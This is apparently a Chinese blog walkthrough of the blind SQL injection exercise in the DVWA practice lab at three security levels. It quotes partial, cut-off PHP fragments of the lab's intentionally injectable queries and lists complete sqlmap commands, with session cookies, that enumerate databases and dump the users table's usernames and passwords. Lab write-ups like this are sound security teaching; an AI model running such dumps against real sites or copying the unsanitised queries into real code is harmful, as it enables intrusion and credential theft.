DVWA靶场通关(SQL Injection(Blind))

SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

LOW

核心代码


SQL Injection (Blind) Source
vulnerabilities/sqli_blind/source/low.php
 0);
                } catch(Exception $e) {
                    $exists = false;
                }
            }
            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo '
User ID exists in the database.
'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '
User ID is MISSING from the database.
'; } } ?>

在这里,直接选用linux中的sqlmap工具进行SQL注入。

(1)列出当前数据库名的命令

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --current-db

红色的位置,针对不同的主机,存在不同的数据。爆出的数据库名为:dvwa

DVWA靶场通关(SQL Injection(Blind))_第1张图片

(2) 列出表名的命令行

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -D dvwa --tables

存在两张表,guestbook和users

DVWA靶场通关(SQL Injection(Blind))_第2张图片

 (3)获取users表中的数据

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -D dvwa -T users --dump --batch

DVWA靶场通关(SQL Injection(Blind))_第3张图片

 Medium


SQL Injection Source
vulnerabilities/sqli/source/medium.php
' . mysqli_error($GLOBALS["___mysqli_ston"]) . '
' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Display values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "
ID: {$id}
First name: {$first}
Surname: {$last}
"; } break; case SQLITE: global $sqlite_db_connection; $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; #print $query; try { $results = $sqlite_db_connection->query($query); } catch (Exception $e) { echo 'Caught exception: ' . $e->getMessage(); exit(); } if ($results) { while ($row = $results->fetchArray()) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "
ID: {$id}
First name: {$first}
Surname: {$last}
"; } } else { echo "Error in fetch ".$sqlite_db->lastErrorMsg(); } break; } } // This is used later on in the index.php page // Setting it here so we can close the database connection in here like in the rest of the source scripts $query = "SELECT COUNT(*) FROM users;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '
' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' ); $number_of_rows = mysqli_fetch_row( $result )[0]; mysqli_close($GLOBALS["___mysqli_ston"]); ?>

解析 PHP代码,提交方式由get变成了post。

(1)针对提交方式由get===》post,因此需要添加--data命令

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit"

DVWA靶场通关(SQL Injection(Blind))_第4张图片

 (2)查看数据库

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -dbs

DVWA靶场通关(SQL Injection(Blind))_第5张图片

 (3) 爆出表名

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -tables

DVWA靶场通关(SQL Injection(Blind))_第6张图片

 (4)查看表users的columns值

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -T users -columns

DVWA靶场通关(SQL Injection(Blind))_第7张图片

(5)查看具体内容并解密

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -T users  -C user,password -dump

 DVWA靶场通关(SQL Injection(Blind))_第8张图片

HIGH


SQL Injection (Blind) Source
vulnerabilities/sqli_blind/source/high.php
 0); // The '@' character suppresses errors
                } catch(Exception $e) {
                    $exists = false;
                }
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo '
User ID exists in the database.
'; } else { // Might sleep a random amount if( rand( 0, 5 ) == 3 ) { sleep( rand( 2, 4 ) ); } // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '
User ID is MISSING from the database.
'; } } ?>

相较于前面两种,这里id 值由cookie 传递,设置了睡眠时间,增加了盲注的时间耗费。

(1)

sqlmap -u"http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php#" --data="id=1&Submit=Submit" --second-u="http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t8drnkrisfem4s5eqej702mmt1"

DVWA靶场通关(SQL Injection(Blind))_第9张图片

(2)查看数据库

sqlmap -u"http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php#" --data="id=1&Submit=Submit" --second-u="http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -dbs

 DVWA靶场通关(SQL Injection(Blind))_第10张图片

 后续步骤与前两种相同,在字段后面添加必要命令。

你可能感兴趣的:(DVWA,sql,web安全)